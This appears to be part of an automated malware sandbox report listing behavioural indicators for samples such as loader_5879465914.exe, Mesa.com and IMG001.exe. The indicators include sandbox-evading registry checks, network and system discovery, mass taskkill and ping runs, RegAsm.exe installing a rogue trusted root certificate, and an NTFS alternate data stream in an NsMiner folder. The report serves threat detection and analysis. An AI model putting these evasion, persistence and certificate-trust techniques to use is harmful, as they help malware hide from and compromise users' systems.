Checks processor information in registry 2 TTPs 28 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Mesa.comfirefox.exefirefox.exefirefox.exefirefox.exeloader_5879465914.exefirefox.exeTPB-1.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Mesa.com Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 loader_5879465914.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TPB-1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TPB-1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString loader_5879465914.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Mesa.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid Process 5260 timeout.exe 6648 timeout.exe 4992 timeout.exe 900 timeout.exe 692 -
Discovers systems in the same network 1 TTPs 7 IoCs
Processes:
net.exenet.exenet.exenet.exenet.exepid Process 4960 net.exe 3140 net.exe 4928 9516 6748 net.exe 5256 net.exe 6872 net.exe -
Enumerates system info in registry 2 TTPs 54 IoCs
Processes:
chrome.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exemsedge.exeloader_5879465914.exexcopy.exexcopy.exechrome.exexcopy.exexcopy.exexcopy.exexcopy.exemsedge.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exechrome.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName loader_5879465914.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS loader_5879465914.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 11 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exepid Process 6232 ipconfig.exe 4304 ipconfig.exe 5608 ipconfig.exe 6684 ipconfig.exe 5424 ipconfig.exe 4424 ipconfig.exe 6276 ipconfig.exe 5012 ipconfig.exe 6820 ipconfig.exe 6508 ipconfig.exe 6768 ipconfig.exe -
Gathers system information 1 TTPs 10 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exepid Process 5860 systeminfo.exe 5416 systeminfo.exe 6576 systeminfo.exe 3324 systeminfo.exe 5492 systeminfo.exe 7148 systeminfo.exe 4884 systeminfo.exe 6004 systeminfo.exe 3852 systeminfo.exe 496 systeminfo.exe -
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 6284 taskkill.exe 916 6680 4860 taskkill.exe 3324 taskkill.exe 5260 taskkill.exe 4016 taskkill.exe 6656 taskkill.exe 3148 taskkill.exe 5680 taskkill.exe 6284 taskkill.exe 6620 6580 taskkill.exe 6176 taskkill.exe 9232 5044 taskkill.exe 5024 taskkill.exe 5548 taskkill.exe 6992 taskkill.exe 2780 taskkill.exe 1604 taskkill.exe 6160 taskkill.exe 6564 taskkill.exe 5092 taskkill.exe 5416 taskkill.exe 6216 7972 1008 taskkill.exe 2228 taskkill.exe 2544 taskkill.exe 6512 4112 6540 taskkill.exe 1496 taskkill.exe 3956 taskkill.exe 4860 taskkill.exe 1852 5092 taskkill.exe 6340 taskkill.exe 6436 5164 4368 taskkill.exe 5908 taskkill.exe 1184 2992 6936 taskkill.exe 1096 taskkill.exe 6472 taskkill.exe 1124 taskkill.exe 2024 taskkill.exe 4280 taskkill.exe 3328 6892 taskkill.exe 2052 taskkill.exe 5332 taskkill.exe 6244 taskkill.exe 5668 5148 taskkill.exe 7308 656 taskkill.exe 3204 taskkill.exe 5236 taskkill.exe 1076 taskkill.exe 5424 -
Processes:
install_lodop32.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe = "0" install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings install_lodop32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings\LOCALMACHINE_CD_UNLOCK = "0" install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN install_lodop32.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772282749917404" chrome.exe -
Modifies registry class 64 IoCs
Processes:
install_lodop32.exefirefox.exefirefox.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0\win32\ = "C:\\Program Files (x86)\\MountTaiSoftware\\Lodop\\CAOSOFT_WEB_PRINT_lodop.ocx" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\TypeLib install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\Version = "6.0" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Control install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED} install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0 install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\HELPDIR install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ = "ILodopX" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ = "ILodopXEvents" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\TypeLib\Version = "6.0" install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB} install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Lodop.LodopX install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\MountTaiSoftware\\Lodop\\CAOSOFT_WEB_PRINT_lodop.ocx,0" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Lodop.LodopX\Clsid\ = "{2105C259-1E0C-4534-8141-A753534CB4CA}" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ProgID\ = "Lodop.LodopX" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\FLAGS install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ = "ILodopXEvents" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32\ThreadingModel = "Apartment" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Lodop.LodopX\ = "LodopX Control" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\MiscStatus\1\ = "205201" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E} install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\TypeLib install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\MiscStatus\1 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Version\ = "6.0" install_lodop32.exe Key created \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\Version = "6.0" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32\ = "C:\\PROGRA~2\\MOUNTT~1\\Lodop\\CAOSOF~1.OCX" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Lodop.LodopX\Clsid install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ProgID install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb\0\ = "Properties,0,2" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\HELPDIR\ = "C:\\Program Files (x86)\\MountTaiSoftware\\Lodop\\" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\TypeLib\Version = "6.0" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\TypeLib install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Control\ install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Verb\ install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\ = "Lodop" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\FLAGS\ = "2" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB} install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ = "LodopX Control" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E} install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\MiscStatus install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\ToolboxBitmap32 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\InprocServer32 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\TypeLib\ = "{0F9014E9-F31C-408E-9CBA-C484B39066ED}" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ProxyStubClsid32 install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DC96C68-587A-486E-93D8-7BA1EAF5B9CB}\ProxyStubClsid32 install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0F9014E9-F31C-408E-9CBA-C484B39066ED}\6.0\0\win32 install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{409D8542-9C63-4719-8DF6-ABDA44494A4E}\ = "ILodopX" install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA} install_lodop32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\Version install_lodop32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2105C259-1E0C-4534-8141-A753534CB4CA}\MiscStatus\ = "0" install_lodop32.exe -
Processes:
RegAsm.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
NTFS ADS 3 IoCs
Processes:
cmd.exeIMG001.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe File created C:\IMG001.exe\:P:$DATA IMG001.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 64 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid Process 2664 5744 PING.EXE 1704 PING.EXE 6612 PING.EXE 6368 PING.EXE 6696 PING.EXE 5168 PING.EXE 5768 PING.EXE 6852 PING.EXE 4620 PING.EXE 3936 PING.EXE 5728 PING.EXE 5544 6276 PING.EXE 3744 PING.EXE 4512 PING.EXE 1096 PING.EXE 2368 PING.EXE 5364 3672 PING.EXE 5372 PING.EXE 7096 PING.EXE 5852 PING.EXE 7472 6860 PING.EXE 848 PING.EXE 2508 PING.EXE 7144 PING.EXE 3036 PING.EXE 3452 PING.EXE 1384 PING.EXE 4892 PING.EXE 5904 PING.EXE 3448 PING.EXE 1500 PING.EXE 3200 PING.EXE 